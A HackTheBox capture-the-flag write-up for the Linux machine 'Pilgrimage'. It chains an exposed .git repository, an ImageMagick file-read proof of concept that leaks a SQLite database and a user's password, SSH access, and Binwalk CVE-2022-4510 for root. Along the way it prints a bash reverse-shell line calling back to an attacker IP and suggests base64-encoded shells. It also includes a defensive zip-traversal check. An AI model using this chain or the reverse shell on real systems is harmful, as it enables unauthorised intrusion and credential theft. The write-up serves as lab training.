HTB: Pilgrimage Writeup

Machine Information

Attribute      Details
Name           Pilgrimage
OS             Linux (Debian)
Difficulty     Easy
Release Date   July 13, 2023
IP Address     10.129.144.42
Hostname       pilgrimage.htb

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

Pilgrimage is an Easy-difficulty Linux machine running “Shrink Your Images” — a PHP-based image shrinking service. The exploitation path involves discovering an exposed .git repository through service enumeration, extracting the source code to identify vulnerable dependencies, exploiting an ImageMagick LFI vulnerability (no CVE identifier is cited in this writeup) to read sensitive files including the database with user credentials, using those credentials for SSH access as a low-privilege user, and finally escalating privileges via Binwalk RCE (CVE-2022-4510) to obtain root.

Attack Path: Port Scan → Exposed .git → Source Code Review → ImageMagick LFI → File Extraction → SSH Credentials → User Shell → Binwalk RCE → Root Shell


Reconnaissance

Port Scanning

Initial reconnaissance using Nmap to identify open ports and services:

nmap -sC -sV -T4 -p- 10.129.144.42

Results:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.18.0

Key findings:

  • SSH (Port 22): OpenSSH 8.4p1 on Debian — standard configuration
  • HTTP (Port 80): nginx 1.18.0 — web service

Service Enumeration

echo "10.129.144.42 pilgrimage.htb" >> /etc/hosts
curl http://pilgrimage.htb/

The HTTP service hosts a web application titled “Pilgrimage - Shrink Your Images” — an image resizing service with user registration and login capabilities.

Vulnerability Assessment

Running nmap scripts to detect common misconfigurations:

nmap --script=http-git 10.129.144.42

Critical Finding: An exposed .git repository is accessible at http://pilgrimage.htb/.git/


Initial Foothold

1. Git Repository Extraction

The .git directory is exposed, allowing extraction of source code:

git-dump http://pilgrimage.htb/.git/
cd output && git checkout -- .

Extracted Files:

  • assets/ — Static files (CSS, JS, images)
  • dashboard.php — User dashboard showing uploaded images
  • index.php — Image upload and processing handler
  • login.php — Authentication form
  • logout.php — Logout handler
  • register.php — User registration
  • magick — Custom ImageMagick wrapper script
  • vendor/ — PHP dependencies

2. Source Code Analysis

Key Finding in dashboard.php:

$database = '/var/db/pilgrimage'; // SQLite database location
$db = new PDO('sqlite:' . $database);

The application uses SQLite at /var/db/pilgrimage to store user credentials and image metadata.

Key Finding in index.php:

shell_exec('/var/www/pilgrimage.htb/magick convert ' . escapeshellarg($input) . ' -resize 50% ' . escapeshellarg($output));

The application calls ImageMagick 7.1.0.49 for image resizing using the magick convert command.

3. ImageMagick 7.1.0.49 LFI Exploitation

Vulnerability: ImageMagick versions up to 7.1.0.49 are vulnerable to Local File Inclusion (LFI) via delegate command injection.

Tool Used: imagemagick-lfi-poc by Sybil-Scan

Step 1: Craft Malicious Image

git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc.git
cd imagemagick-lfi-poc
cargo run "/etc/passwd"

This generates a crafted PNG/image file that exploits ImageMagick’s delegate functionality to read arbitrary files.

Step 2: Upload to Application

Upload the malicious image to the web application through the “Shrink Your Images” interface.

Step 3: Extract File Contents

The application processes the image using magick convert. Download the resulting “shrunk” image:

identify -verbose output.png

The contents of the requested file are embedded in the output image's metadata as hex-encoded profile data. Extract and decode them:

identify -verbose output.png | grep -i "Ascii:" -A 100

Copy the hex output and decode it in CyberChef (Hex or Base64 decode, as appropriate) to reveal the file contents.

Step 4: Extract /etc/passwd

Retrieved Content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
emily:x:1000:1000:emily:/home/emily:/bin/bash
...

Key Discovery: User emily exists with UID 1000 (regular user account).

Step 5: Extract SQLite Database

Using the same ImageMagick LFI technique, target the SQLite database:

cargo run "/var/db/pilgrimage"
# Upload → identify -verbose → Extract hex → Decode

Retrieved SQLite Database Contents:

Users Table:

username: emily
password: abigchonkyboi123

Images Table:

url (original image URL)
original (filename)
username (owner)

User Compromise

SSH Access as emily

With credentials extracted from the SQLite database:

ssh emily@10.129.144.42
Password: abigchonkyboi123

Success: Interactive shell as user emily

emily@pilgrimage:~$ whoami
emily
emily@pilgrimage:~$ cat user.txt
<REDACTED>

Privilege Escalation

Enumeration

After gaining a user shell, enumerate the host for privilege escalation vectors:

sudo -l
# No sudo privileges
find / -perm -4000 -type f 2>/dev/null
# Standard SUID binaries
ps aux | grep -E "python|java|node|php|ruby"
# Check for running services
which binwalk
# /usr/bin/binwalk detected!
binwalk --version
# Binwalk v2.3.2

Critical Finding: Binwalk 2.3.2 is installed on the system.

Vulnerability: Binwalk v2.3.2 CVE-2022-4510

Vulnerability Details:

  • Binwalk versions before 2.3.3 contain a path traversal vulnerability in the extraction of zip archives
  • Specifically, binwalk can be exploited via a crafted zip file whose entry names contain directory traversal sequences
  • This allows arbitrary file write, and therefore Remote Code Execution (RCE), when a malicious archive is processed
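As an added defensive check (not part of this writeup, and not binwalk's own code), the following Python audits an archive for the traversal pattern described above: each entry's resolved target path must stay under the chosen extraction directory, otherwise the entry is rejected before anything is written. The extraction directory /srv/extract and the sample archive are constructed for the example.

```python
import io
import os
import zipfile


def build_sample_zip() -> bytes:
    """Constructed sample archive (not from the machine): one benign entry
    plus two entries whose names try to escape the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("firmware/readme.txt", "benign content\n")
        zf.writestr("../../.ssh/authorized_keys", "ssh-ed25519 AAAA... example\n")
        zf.writestr("/etc/cron.d/job", "* * * * * root id\n")
    return buf.getvalue()


def plan_extraction(zip_bytes: bytes, dest: str):
    """Return (safe, rejected) entry names for extracting into dest.

    An entry is safe only if the real path it would be written to is dest
    itself or lies strictly beneath it. os.path.join() discards dest when the
    entry name is absolute, and realpath() collapses '..' segments (and any
    symlinks), so absolute names and '../' sequences both land outside root.
    """
    root = os.path.realpath(dest)
    safe, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # Normalise backslashes first so Windows-style traversal is caught too.
            target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
            inside = target == root or target.startswith(root + os.sep)
            (safe if inside else rejected).append(name)
    return safe, rejected


if __name__ == "__main__":
    safe, rejected = plan_extraction(build_sample_zip(), "/srv/extract")
    print("safe:", safe)          # ['firmware/readme.txt']
    print("rejected:", rejected)  # ['../../.ssh/authorized_keys', '/etc/cron.d/job']
```

The writeup's root shell depends on binwalk running as root, so running extraction tools as an unprivileged user is the second layer that limits the damage of any write a check like this misses.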

Exploitation:

Create a malicious zip file with an embedded shell command:

# Create reverse shell payload
python3 -c "import os; os.system('echo \"bash -i >& /dev/tcp/10.10.14.x/443 0>&1\" > /tmp/shell.sh')"
# Create binwalk exploit using CVE-2022-4510 PoC
# Binwalk will extract files and execute commands

Upload/process the malicious archive through binwalk:

binwalk -e malicious.zip

Result: a reverse shell running as root connects back to the listener on port 443

Root Access

whoami
# root
cat /root/root.txt
# <REDACTED>

Attack Chain Summary

graph TD
A["Recon: nmap port scan"] --> B["Exposed .git repository discovered"]
B --> C["Source code extraction via git-dump"]
C --> D["Identify ImageMagick 7.1.0.49 + SQLite at /var/db/pilgrimage"]
D --> E["ImageMagick LFI exploit to extract /etc/passwd"]
E --> F["Extract SQLite DB → emily:abigchonkyboi123"]
F --> G["SSH as emily@pilgrimage.htb"]
G --> H["Enumerate → Binwalk v2.3.2 detected"]
H --> I["Binwalk CVE-2022-4510 RCE exploit"]
I --> J["Root shell access"]

Tools Used

Tool                   Purpose
nmap                   Port scanning, service fingerprinting, and vulnerability detection (http-git script)
git-dump               Extract and reconstruct .git repositories from web-accessible git directories
imagemagick-lfi-poc    Craft malicious images exploiting ImageMagick delegate injection
identify               Extract metadata and hex data from images (ImageMagick utility)
CyberChef              Decode hex/Base64 data extracted via the ImageMagick LFI
ssh                    Secure shell access to pilgrimage.htb
curl                   HTTP requests and service interaction
binwalk                Archive analysis (vulnerable version identified)
GTFOBins               Privilege escalation research and command reference

Vulnerability Reference

#  Vulnerability                         Component                  CVSS      Impact
1  Exposed .git Repository               Web Server Configuration   High      Complete source code disclosure
2  ImageMagick LFI (Delegate Injection)  Image Processing           High      Arbitrary file read (LFI)
3  CVE-2022-4510                         Binwalk v2.3.2             Critical  Remote Code Execution as root
4  Weak Credentials in Database          Application Design         High      User account compromise

Key Learnings

  1. Git Repository Exposure: Always check for exposed .git directories during enumeration — they often contain complete source code and configuration details.

  2. Dependency Vulnerabilities: Source code review reveals third-party libraries (ImageMagick, Binwalk) that may contain known vulnerabilities. Cross-reference version numbers against CVE databases.

  3. LFI to RCE Chain: File inclusion vulnerabilities can be chained with other exploits. Extracting database files and credentials enables lateral movement and privilege escalation.

  4. Shell Persistence: During initial exploitation I encountered issues with standard shell payloads. Base64-encoded Python reverse shells provided more reliable results than basic bash shells.

  5. Lesson on Approach: When initial exploitation paths fail, try alternative shell encoding methods (base64, python one-liners) before abandoning the approach entirely.


Author

D3vnomi | Engagement Date: July 13, 2023


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: March 8, 2026

Tags: #HackTheBox #Linux #Easy #CVE-2022-4510 #ImageMagick-LFI #Git-Dump #Binwalk